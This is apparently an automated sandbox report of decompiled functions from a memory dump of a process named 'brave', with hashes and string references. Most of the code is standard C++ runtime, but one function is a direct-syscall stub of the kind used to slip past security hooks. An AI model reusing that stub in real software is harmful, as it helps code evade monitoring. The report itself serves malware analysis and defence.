Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: memcpy
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::assign
API String ID: 3510742995-2669816585
Opcode ID: 336f956ad0847754b7ed12ec066e3f99e5549a7b523b592d2852de853e97e5d0
Instruction ID: 2fa8bbbfbd60f0889908c03b3b852134f9e5908d66608f1ad894c466157aec3c
Opcode Fuzzy Hash: 336f956ad0847754b7ed12ec066e3f99e5549a7b523b592d2852de853e97e5d0
Instruction Fuzzy Hash: 73F090A6E05B8585E610AF61DC410ACA362F79AF8CF884232DA8C63321DF7CD552CB04

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B45530 Relevance: 2.5, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF652B45530(signed int** __rcx, intOrPtr* __rdx, void* __r8, void* __r9) {
				intOrPtr _t8;

				_t8 =  *((intOrPtr*)(__rdx + 8));
				if (__r8 - _t8 > 0) goto 0x52b45576;
				 *((long long*)(__rcx)) = __rcx + 0x10;
				_t10 =  >  ? __r9 : _t8 - __r8;
				r9d = 0;
				return E00007FF67FF652B4B310(__rcx,  *__rdx + __r8,  *__rdx + __r8 + ( >  ? __r9 : _t8 - __r8));
			}

0x7ff652b45536
0x7ff652b45540
0x7ff652b45549
0x7ff652b45556
0x7ff652b4555d
0x7ff652b45575

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF652B45580
basic_string::substr, xrefs: 00007FF652B45579

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::substr
API String ID: 0-3532027576
Opcode ID: 101c97d25de8f3686c31f21e631c822240c8c23bd588f4edd234e44d22aeb880
Instruction ID: 36d7bdfbe179b1209bd6dca66ca602c2df268d990a1dd461a771ea4310e79256
Opcode Fuzzy Hash: 101c97d25de8f3686c31f21e631c822240c8c23bd588f4edd234e44d22aeb880
Instruction Fuzzy Hash: 74F0E912F04B0641EE00DBA6D8904B86320F765BCCF545532C94D67310ED7CE145C344

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B522E0 Relevance: 1.4, Strings: 1, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E00007FF67FF652B522E0() {
				long long _v584;
				void* _t81;
				void* _t83;
				void* _t84;
				int*** _t87;
				intOrPtr _t88;
				int** _t89;
				intOrPtr _t90;
				int* _t91;
				intOrPtr _t92;
				int _t93;
				long long* _t102;
				void* _t103;
				void* _t104;
				int _t119;
				int _t127;
				void* _t193;
				void* _t194;
				int _t195;
				int _t196;
				int _t197;
				int _t198;
				int _t199;
				int _t200;
				int _t201;
				int _t202;
				void* _t204;
				int _t210;
				int _t214;

				E00007FF67FF652B519A0(_t83, _t84, _t87, _t104);
				_t88 =  *0x52dd6830; // 0x7ff652dd7390
				_t89 = _t88 + 0x10;
				 *_t87 = _t89;
				E00007FF67FF652B52160(8, _t81, _t89, _t103, _t87, 0x52dd6cb0, 0x7ff652b50fb0, _t193, _t194, _t204);
				0;
				0;
				E00007FF67FF652B519A0(_t83, _t84, _t89, _t87);
				_t90 =  *0x52dd6820; // 0x7ff652dd7360
				_t91 = _t90 + 0x10;
				 *_t89 = _t91;
				E00007FF67FF652B52160(8, _t81, _t91, _t103, _t89, 0x52dd6c90, 0x7ff652b50f70, _t193, _t194, _t204);
				0;
				0;
				E00007FF67FF652B519A0(_t83, _t84, _t91, _t89);
				_t107 = _t91;
				_t92 =  *0x52dd6770; // 0x7ff652dd7150
				_t93 = _t92 + 0x10;
				 *_t91 = _t93;
				E00007FF67FF652B52160(8, _t81, _t93, _t103, _t91, 0x52dd6b30, 0x7ff652b49670, _t193, _t194, _t204);
				0;
				0;
				_push(_t204);
				_push(_t194);
				E00007FF67FF652B519A0(_t83, _t84, _t93, _t107);
				_t195 = _t93;
				E00007FF67FF652B49680(_t93, _t107);
				E00007FF67FF652B52160(0x10, _t81, _t93, _t103, _t195, 0x52dd6b50, 0x7ff652b497b0, _t193, _t195, _t107);
				_t206 = _t93;
				E00007FF67FF652B51CF0(_t195);
				E00007FF67FF652B2FEC0();
				_push(_t93);
				_push(_t195);
				E00007FF67FF652B519A0(_t83, _t84, _t93, _t93);
				_t196 = _t93;
				E00007FF67FF652B49F90(_t93, _t93);
				E00007FF67FF652B52160(0x10, _t81, _t93, _t103, _t196, 0x52dd6b90, 0x7ff652b4a0b0, _t193, _t196, _t206);
				_t208 = _t93;
				E00007FF67FF652B51CF0(_t196);
				E00007FF67FF652B2FEC0();
				_push(_t93);
				_push(_t196);
				E00007FF67FF652B519A0(_t83, _t84, _t93, _t93);
				_t197 = _t93;
				E00007FF67FF652B4AC70(_t93, _t93);
				E00007FF67FF652B52160(0x10, _t81, _t93, _t103, _t197, 0x52dd6c70, 0x7ff652b4ad90, _t193, _t197, _t208);
				_t210 = _t93;
				E00007FF67FF652B51CF0(_t197);
				_t119 = _t210;
				E00007FF67FF652B2FEC0();
				_push(_t210);
				_push(_t197);
				E00007FF67FF652B519A0(_t83, _t84, _t93, _t119);
				_t198 = _t93;
				E00007FF67FF652B4A110(_t93, _t119);
				E00007FF67FF652B52160(0x10, _t81, _t93, _t103, _t198, 0x52dd6bb0, 0x7ff652b4a230, _t193, _t198, _t119);
				_t212 = _t93;
				E00007FF67FF652B51CF0(_t198);
				E00007FF67FF652B2FEC0();
				_push(_t93);
				_push(_t198);
				E00007FF67FF652B519A0(_t83, _t84, _t93, _t93);
				_t199 = _t93;
				E00007FF67FF652B4A290(_t93, _t93);
				E00007FF67FF652B52160(0x10, _t81, _t93, _t103, _t199, 0x52dd6bd0, 0x7ff652b4a3b0, _t193, _t199, _t212);
				_t214 = _t93;
				E00007FF67FF652B51CF0(_t199);
				_t127 = _t214;
				E00007FF67FF652B2FEC0();
				_push(_t214);
				_push(_t199);
				E00007FF67FF652B519A0(_t83, _t84, _t93, _t127);
				_t200 = _t93;
				E00007FF67FF652B4A7A0(_t93, _t127);
				E00007FF67FF652B52160(0x10, _t81, _t93, _t103, _t200, 0x52dd6c10, 0x7ff652b4a8d0, _t193, _t200, _t127);
				_t216 = _t93;
				E00007FF67FF652B51CF0(_t200);
				E00007FF67FF652B2FEC0();
				_push(_t93);
				_push(_t200);
				E00007FF67FF652B519A0(_t83, _t84, _t93, _t93);
				_t201 = _t93;
				E00007FF67FF652B49850(_t93, _t93);
				E00007FF67FF652B52160(0x10, _t81, _t93, _t103, _t201, 0x52dd6b70, 0x7ff652b49970, _t193, _t201, _t216);
				_t218 = _t93;
				E00007FF67FF652B51CF0(_t201);
				E00007FF67FF652B2FEC0();
				_push(_t93);
				_push(_t201);
				E00007FF67FF652B519A0(_t83, _t84, _t93, _t93);
				_t202 = _t93;
				E00007FF67FF652B4A970(_t93, _t93);
				E00007FF67FF652B52160(0x10, _t81, _t93, _t103, _t202, 0x52dd6c30, 0x7ff652b4aa90, _t193, _t202, _t218);
				_t220 = _t93;
				E00007FF67FF652B51CF0(_t202);
				E00007FF67FF652B2FEC0();
				_push(_t93);
				E00007FF67FF652B519A0(_t83, _t84, _t93, _t93);
				E00007FF67FF652B4AAF0(_t93, _t93);
				E00007FF67FF652B52160(0x10, _t81, _t93, _t103, _t93, 0x52dd6c50, 0x7ff652b4ac10, _t193, _t93, _t220);
				E00007FF67FF652B51CF0(_t93);
				E00007FF67FF652B2FEC0();
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				asm("ud2");
				_v584 = 0;
				_t102 =  *0x10;
				asm("ud2");
				0;
				E00007FF67FF652B30980(0x52dd2d20, 0x52dd6c50);
				 *0x52dd2d38 = 0x12400; // executed
				malloc(_t202); // executed
				 *0x52dd2d30 = _t102;
				if (_t102 == 0) goto 0x52b52789;
				 *0x52dd2d28 = _t102;
				 *_t102 = 0x12400;
				 *((long long*)(_t102 + 8)) = 0;
				goto E00007FF67FF652B21520;
				 *0x52dd2d38 = 0;
				 *0x52dd2d28 = 0;
				goto 0x52b52779;
				0;
				0;
				0;
			}

0x7ff652b522e9
0x7ff652b522ff
0x7ff652b52306
0x7ff652b5230a
0x7ff652b5230d
0x7ff652b52318
0x7ff652b5231c
0x7ff652b52329
0x7ff652b5233f
0x7ff652b52346
0x7ff652b5234a
0x7ff652b5234d
0x7ff652b52358
0x7ff652b5235c
0x7ff652b52369
0x7ff652b5237c
0x7ff652b5237f
0x7ff652b52386
0x7ff652b5238a
0x7ff652b5238d
0x7ff652b52398
0x7ff652b5239c
0x7ff652b523a0
0x7ff652b523a2
0x7ff652b523b0
0x7ff652b523bb
0x7ff652b523be
0x7ff652b523d4
0x7ff652b523d9
0x7ff652b523df
0x7ff652b523e7
0x7ff652b523f0
0x7ff652b523f2
0x7ff652b52400
0x7ff652b5240b
0x7ff652b5240e
0x7ff652b52424
0x7ff652b52429
0x7ff652b5242f
0x7ff652b52437
0x7ff652b52440
0x7ff652b52442
0x7ff652b52450
0x7ff652b5245b
0x7ff652b5245e
0x7ff652b52474
0x7ff652b52479
0x7ff652b5247f
0x7ff652b52484
0x7ff652b52487
0x7ff652b52490
0x7ff652b52492
0x7ff652b524a0
0x7ff652b524ab
0x7ff652b524ae
0x7ff652b524c4
0x7ff652b524c9
0x7ff652b524cf
0x7ff652b524d7
0x7ff652b524e0
0x7ff652b524e2
0x7ff652b524f0
0x7ff652b524fb
0x7ff652b524fe
0x7ff652b52514
0x7ff652b52519
0x7ff652b5251f
0x7ff652b52524
0x7ff652b52527
0x7ff652b52530
0x7ff652b52532
0x7ff652b52540
0x7ff652b5254b
0x7ff652b5254e
0x7ff652b52564
0x7ff652b52569
0x7ff652b5256f
0x7ff652b52577
0x7ff652b52580
0x7ff652b52582
0x7ff652b52590
0x7ff652b5259b
0x7ff652b5259e
0x7ff652b525b4
0x7ff652b525b9
0x7ff652b525bf
0x7ff652b525c7
0x7ff652b525d0
0x7ff652b525d2
0x7ff652b525e0
0x7ff652b525eb
0x7ff652b525ee
0x7ff652b52604
0x7ff652b52609
0x7ff652b5260f
0x7ff652b52617
0x7ff652b52620
0x7ff652b52630
0x7ff652b5263e
0x7ff652b52654
0x7ff652b5265f
0x7ff652b52667
0x7ff652b52670
0x7ff652b52681
0x7ff652b52683
0x7ff652b52694
0x7ff652b52696
0x7ff652b526a7
0x7ff652b526a9
0x7ff652b526ba
0x7ff652b526bc
0x7ff652b526c7
0x7ff652b526c9
0x7ff652b526da
0x7ff652b526dc
0x7ff652b526ed
0x7ff652b526ef
0x7ff652b52700
0x7ff652b52702
0x7ff652b52713
0x7ff652b52715
0x7ff652b5271e
0x7ff652b52726
0x7ff652b5272e
0x7ff652b5273d
0x7ff652b52747
0x7ff652b52752
0x7ff652b52757
0x7ff652b52761
0x7ff652b52763
0x7ff652b5276a
0x7ff652b52771
0x7ff652b52784
0x7ff652b52789
0x7ff652b52794
0x7ff652b5279f
0x7ff652b527a7
0x7ff652b527ab
0x7ff652b527af

Strings

basic_string::_M_create, xrefs: 00007FF652B523A2

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: strlen$CaptureContextUnwindabortmalloc
String ID: basic_string::_M_create
API String ID: 214865124-3122258987
Opcode ID: 56a730b624957fdfe59585361835cd4944ad67ef4d9076c70fd66d217f432776
Instruction ID: e7de6c710153faae59cfd619f4ce5e8d110f04c361a3d412e4e546e5a6fab81d
Opcode Fuzzy Hash: 56a730b624957fdfe59585361835cd4944ad67ef4d9076c70fd66d217f432776
Instruction Fuzzy Hash: 02412F50F1A68750E908BB66EC551BA1362BF47BCCF882531ED4DBF387EDACA0058391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B523A0 Relevance: 1.3, Strings: 1, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00007FF67FF652B523A0() {
				long long _v464;
				void* _t69;
				void* _t71;
				void* _t72;
				int _t74;
				long long* _t83;
				void* _t84;
				void* _t85;
				int _t97;
				int _t105;
				void* _t162;
				int _t163;
				int _t164;
				int _t165;
				int _t166;
				int _t167;
				int _t168;
				int _t169;
				int _t170;
				int _t177;
				int _t181;

				E00007FF67FF652B519A0(_t71, _t72, _t74, _t85);
				_t163 = _t74;
				E00007FF67FF652B49680(_t74, _t85);
				E00007FF67FF652B52160(0x10, _t69, _t74, _t84, _t163, 0x52dd6b50, 0x7ff652b497b0, _t162, _t163, _t85);
				_t173 = _t74;
				E00007FF67FF652B51CF0(_t163);
				E00007FF67FF652B2FEC0();
				_push(_t74);
				_push(_t163);
				E00007FF67FF652B519A0(_t71, _t72, _t74, _t74);
				_t164 = _t74;
				E00007FF67FF652B49F90(_t74, _t74);
				E00007FF67FF652B52160(0x10, _t69, _t74, _t84, _t164, 0x52dd6b90, 0x7ff652b4a0b0, _t162, _t164, _t173);
				_t175 = _t74;
				E00007FF67FF652B51CF0(_t164);
				E00007FF67FF652B2FEC0();
				_push(_t74);
				_push(_t164);
				E00007FF67FF652B519A0(_t71, _t72, _t74, _t74);
				_t165 = _t74;
				E00007FF67FF652B4AC70(_t74, _t74);
				E00007FF67FF652B52160(0x10, _t69, _t74, _t84, _t165, 0x52dd6c70, 0x7ff652b4ad90, _t162, _t165, _t175);
				_t177 = _t74;
				E00007FF67FF652B51CF0(_t165);
				_t97 = _t177;
				E00007FF67FF652B2FEC0();
				_push(_t177);
				_push(_t165);
				E00007FF67FF652B519A0(_t71, _t72, _t74, _t97);
				_t166 = _t74;
				E00007FF67FF652B4A110(_t74, _t97);
				E00007FF67FF652B52160(0x10, _t69, _t74, _t84, _t166, 0x52dd6bb0, 0x7ff652b4a230, _t162, _t166, _t97);
				_t179 = _t74;
				E00007FF67FF652B51CF0(_t166);
				E00007FF67FF652B2FEC0();
				_push(_t74);
				_push(_t166);
				E00007FF67FF652B519A0(_t71, _t72, _t74, _t74);
				_t167 = _t74;
				E00007FF67FF652B4A290(_t74, _t74);
				E00007FF67FF652B52160(0x10, _t69, _t74, _t84, _t167, 0x52dd6bd0, 0x7ff652b4a3b0, _t162, _t167, _t179);
				_t181 = _t74;
				E00007FF67FF652B51CF0(_t167);
				_t105 = _t181;
				E00007FF67FF652B2FEC0();
				_push(_t181);
				_push(_t167);
				E00007FF67FF652B519A0(_t71, _t72, _t74, _t105);
				_t168 = _t74;
				E00007FF67FF652B4A7A0(_t74, _t105);
				E00007FF67FF652B52160(0x10, _t69, _t74, _t84, _t168, 0x52dd6c10, 0x7ff652b4a8d0, _t162, _t168, _t105);
				_t183 = _t74;
				E00007FF67FF652B51CF0(_t168);
				E00007FF67FF652B2FEC0();
				_push(_t74);
				_push(_t168);
				E00007FF67FF652B519A0(_t71, _t72, _t74, _t74);
				_t169 = _t74;
				E00007FF67FF652B49850(_t74, _t74);
				E00007FF67FF652B52160(0x10, _t69, _t74, _t84, _t169, 0x52dd6b70, 0x7ff652b49970, _t162, _t169, _t183);
				_t185 = _t74;
				E00007FF67FF652B51CF0(_t169);
				E00007FF67FF652B2FEC0();
				_push(_t74);
				_push(_t169);
				E00007FF67FF652B519A0(_t71, _t72, _t74, _t74);
				_t170 = _t74;
				E00007FF67FF652B4A970(_t74, _t74);
				E00007FF67FF652B52160(0x10, _t69, _t74, _t84, _t170, 0x52dd6c30, 0x7ff652b4aa90, _t162, _t170, _t185);
				_t187 = _t74;
				E00007FF67FF652B51CF0(_t170);
				E00007FF67FF652B2FEC0();
				_push(_t74);
				E00007FF67FF652B519A0(_t71, _t72, _t74, _t74);
				E00007FF67FF652B4AAF0(_t74, _t74);
				E00007FF67FF652B52160(0x10, _t69, _t74, _t84, _t74, 0x52dd6c50, 0x7ff652b4ac10, _t162, _t74, _t187);
				E00007FF67FF652B51CF0(_t74);
				E00007FF67FF652B2FEC0();
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				 *0 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				asm("ud2");
				_v464 = 0;
				_t83 =  *0x10;
				asm("ud2");
				0;
				E00007FF67FF652B30980(0x52dd2d20, 0x52dd6c50);
				 *0x52dd2d38 = 0x12400; // executed
				malloc(_t170); // executed
				 *0x52dd2d30 = _t83;
				if (_t83 == 0) goto 0x52b52789;
				 *0x52dd2d28 = _t83;
				 *_t83 = 0x12400;
				 *((long long*)(_t83 + 8)) = 0;
				goto E00007FF67FF652B21520;
				 *0x52dd2d38 = 0;
				 *0x52dd2d28 = 0;
				goto 0x52b52779;
				0;
				0;
				0;
			}

0x7ff652b523b0
0x7ff652b523bb
0x7ff652b523be
0x7ff652b523d4
0x7ff652b523d9
0x7ff652b523df
0x7ff652b523e7
0x7ff652b523f0
0x7ff652b523f2
0x7ff652b52400
0x7ff652b5240b
0x7ff652b5240e
0x7ff652b52424
0x7ff652b52429
0x7ff652b5242f
0x7ff652b52437
0x7ff652b52440
0x7ff652b52442
0x7ff652b52450
0x7ff652b5245b
0x7ff652b5245e
0x7ff652b52474
0x7ff652b52479
0x7ff652b5247f
0x7ff652b52484
0x7ff652b52487
0x7ff652b52490
0x7ff652b52492
0x7ff652b524a0
0x7ff652b524ab
0x7ff652b524ae
0x7ff652b524c4
0x7ff652b524c9
0x7ff652b524cf
0x7ff652b524d7
0x7ff652b524e0
0x7ff652b524e2
0x7ff652b524f0
0x7ff652b524fb
0x7ff652b524fe
0x7ff652b52514
0x7ff652b52519
0x7ff652b5251f
0x7ff652b52524
0x7ff652b52527
0x7ff652b52530
0x7ff652b52532
0x7ff652b52540
0x7ff652b5254b
0x7ff652b5254e
0x7ff652b52564
0x7ff652b52569
0x7ff652b5256f
0x7ff652b52577
0x7ff652b52580
0x7ff652b52582
0x7ff652b52590
0x7ff652b5259b
0x7ff652b5259e
0x7ff652b525b4
0x7ff652b525b9
0x7ff652b525bf
0x7ff652b525c7
0x7ff652b525d0
0x7ff652b525d2
0x7ff652b525e0
0x7ff652b525eb
0x7ff652b525ee
0x7ff652b52604
0x7ff652b52609
0x7ff652b5260f
0x7ff652b52617
0x7ff652b52620
0x7ff652b52630
0x7ff652b5263e
0x7ff652b52654
0x7ff652b5265f
0x7ff652b52667
0x7ff652b52670
0x7ff652b52681
0x7ff652b52683
0x7ff652b52694
0x7ff652b52696
0x7ff652b526a7
0x7ff652b526a9
0x7ff652b526ba
0x7ff652b526bc
0x7ff652b526c7
0x7ff652b526c9
0x7ff652b526da
0x7ff652b526dc
0x7ff652b526ed
0x7ff652b526ef
0x7ff652b52700
0x7ff652b52702
0x7ff652b52713
0x7ff652b52715
0x7ff652b5271e
0x7ff652b52726
0x7ff652b5272e
0x7ff652b5273d
0x7ff652b52747
0x7ff652b52752
0x7ff652b52757
0x7ff652b52761
0x7ff652b52763
0x7ff652b5276a
0x7ff652b52771
0x7ff652b52784
0x7ff652b52789
0x7ff652b52794
0x7ff652b5279f
0x7ff652b527a7
0x7ff652b527ab
0x7ff652b527af

Strings

basic_string::_M_create, xrefs: 00007FF652B523A2

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID: strlen$CaptureContextUnwindabortmalloc
String ID: basic_string::_M_create
API String ID: 214865124-3122258987
Opcode ID: 07c73089a9c23fa8787c8356b327776d2c61bf32108450415a4ed1dc3e9e7dc6
Instruction ID: 50b596f3d8f3ad028eaaab88297f30c6ae9c54025f0762595f8f145211d0a963
Opcode Fuzzy Hash: 07c73089a9c23fa8787c8356b327776d2c61bf32108450415a4ed1dc3e9e7dc6
Instruction Fuzzy Hash: B4114F44F1A58350E908BB62AC651F65212BF87BCDF882831EC4DBF383EDACA0058381

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B24C80 Relevance: .0, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E00007FF67FF652B24C80(long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a16, long long _a24, long long _a32, long long _a40) {
				void* _t9;
				intOrPtr _t10;
				void* _t11;

				_pop(_t11);
				_a16 = __rcx;
				_a24 = __rdx;
				_a32 = __r8;
				_a40 = __r9;
				_t10 =  *0x52dd2b40; // 0x24ac1733
				_t9 = E00007FF67FF652B24C20(_t10, _t11);
				asm("syscall");
				return _t9;
			}

0x7ff652b24c80
0x7ff652b24c81
0x7ff652b24c86
0x7ff652b24c8b
0x7ff652b24c90
0x7ff652b24c99
0x7ff652b24c9f
0x7ff652b24cbf
0x7ff652b24cc1

Memory Dump Source

Source File: 00000006.00000002.487203108.00007FF652B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF652B20000, based on PE: true

Associated: 00000006.00000002.487173006.00007FF652B20000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487809666.00007FF652B53000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.487908896.00007FF652B55000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499313042.00007FF652DD1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499402092.00007FF652DD3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499548811.00007FF652DD9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499781272.00007FF652DE1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499896019.00007FF652DE3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499953927.00007FF652DE6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000006.00000002.499997688.00007FF652DE7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7ff652b20000_brave.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dae371a8610d859356a0b0e471f64f9d264ed4058a6e4d7a127b9e3f5264a2ab
Instruction ID: 22bab6f83618fd47ca0c67c9fe79de9a57120ac1bce4deacb3136ccf627eedf1
Opcode Fuzzy Hash: dae371a8610d859356a0b0e471f64f9d264ed4058a6e4d7a127b9e3f5264a2ab
Instruction Fuzzy Hash: B7E09A76908B8191C214DB56F89045EB774F7997C8B105925EECC53B29CF7CD1508F50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF652B43230 Relevance: 63.2, APIs: 13, Strings: 23, Instructions: 184
fileCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E00007FF67FF652B43230(void* __edi, void* __eflags, void* __rbx, void* __rcx, void* __rdx, int __rdi, void* __rsi, void* __r12, char* __r13, int __r14, void* __r15) {
				void* _t43;
				void* _t75;
				void* _t93;
				void* _t94;
				intOrPtr _t100;
				long long* _t107;
				void* _t113;
				long long* _t114;
				long long* _t134;
				long long _t136;
				void* _t142;
				char* _t153;
				void* _t154;
				void* _t155;
				void* _t156;
				void* _t157;
				void* _t158;
				long long* _t170;

				_t93 = __edi;
				_t156 = _t155 - 0x90;
				_t154 = _t156 + 0x90;
				 *((long long*)(_t154 - 0x38)) = 0x7562206c;
				_t138 = __rdx - __rcx;
				 *((long long*)(_t154 - 0x40)) = 0x74696d62;
				 *((long long*)(_t154 - 0x30)) = 0x74726f70;
				_t5 = _t138 + 0x78; // 0x756f6e6520746fe6
				 *((long long*)(_t154 - 0x28)) = 0x70747468;
				 *((long long*)(_t154 - 0x20)) = 0x2e636367;
				 *((long long*)(_t154 - 0x18)) = 0x2f67726f;
				_t113 = __rdx - __rcx;
				 *((long long*)(_t154 - 0x70)) = 0x20746f6e;
				 *((long long*)(_t154 - 0x68)) = 0x73206867;
				 *((long long*)(_t154 - 0x60)) = 0x726f6620;
				 *((long long*)(_t154 - 0x58)) = 0x2074616d;
				 *((long long*)(_t154 - 0x50)) = 0x6f69736e;
				 *((long long*)(_t154 - 0x48)) = 0x7361656c;
				 *((long long*)(_t154 - 0x10)) = 0xa3a292f;
				 *((char*)(_t154 - 8)) = 0;
				E00007FF67FF652B2F680(_t43);
				_t157 = _t156 - (_t5 & 0xfffffff0);
				 *((long long*)(_t157 + 0x58)) = 0x7562206c;
				 *((long long*)(_t157 + 0x50)) = 0x74696d62;
				 *((long long*)(_t157 + 0x68)) = 0x70747468;
				 *((long long*)(_t157 + 0x60)) = 0x74726f70;
				 *((long long*)(_t157 + 0x78)) = 0x2f67726f;
				_t142 = __rcx;
				 *((long long*)(_t157 + 0x80)) = 0xa3a292f;
				 *(_t157 + 0x20) = 0x20746f6e;
				 *((long long*)(_t157 + 0x28)) = 0x73206867;
				 *((long long*)(_t157 + 0x30)) = 0x726f6620;
				 *((long long*)(_t157 + 0x38)) = 0x2074616d;
				 *((long long*)(_t157 + 0x40)) = 0x6f69736e;
				 *((long long*)(_t157 + 0x48)) = 0x7361656c;
				 *((long long*)(_t157 + 0x70)) = 0x2e636367;
				memcpy(__rbx, __rsi, __rdi);
				 *((char*)(_t157 + _t113 + 0x88)) = 0;
				E00007FF67FF652B523A0();
				0;
				0;
				_t158 = _t157 - 0x30;
				if ( *0x52dd2d60 != 0) goto 0x52b434da;
				 *0x52dd2d60 = 1;
				E00007FF67FF652B51BC0(0x2e636367);
				if (0x2e636367 == 0) goto 0x52b434b0;
				 *((intOrPtr*)(_t158 + 0x2c)) = 0xffffffff;
				r8d = 0;
				E00007FF67FF652B2E1F0(0x2e636367,  *0x2E756E672E63636F + 0x2e636367, _t142, _t113, _t158 + 0x2c);
				_t114 =  *0x52dd2c70; // 0x7ff652b41d50
				 *_t114();
				r8d = 0x30;
				fwrite(_t113, _t157 + 0x20);
				if ( *((intOrPtr*)(_t158 + 0x2c)) == 0) goto 0x52b434a1;
				 *_t114();
				fputs(__r13);
				 *_t114();
				r8d = 2;
				fwrite(__r12, __r14);
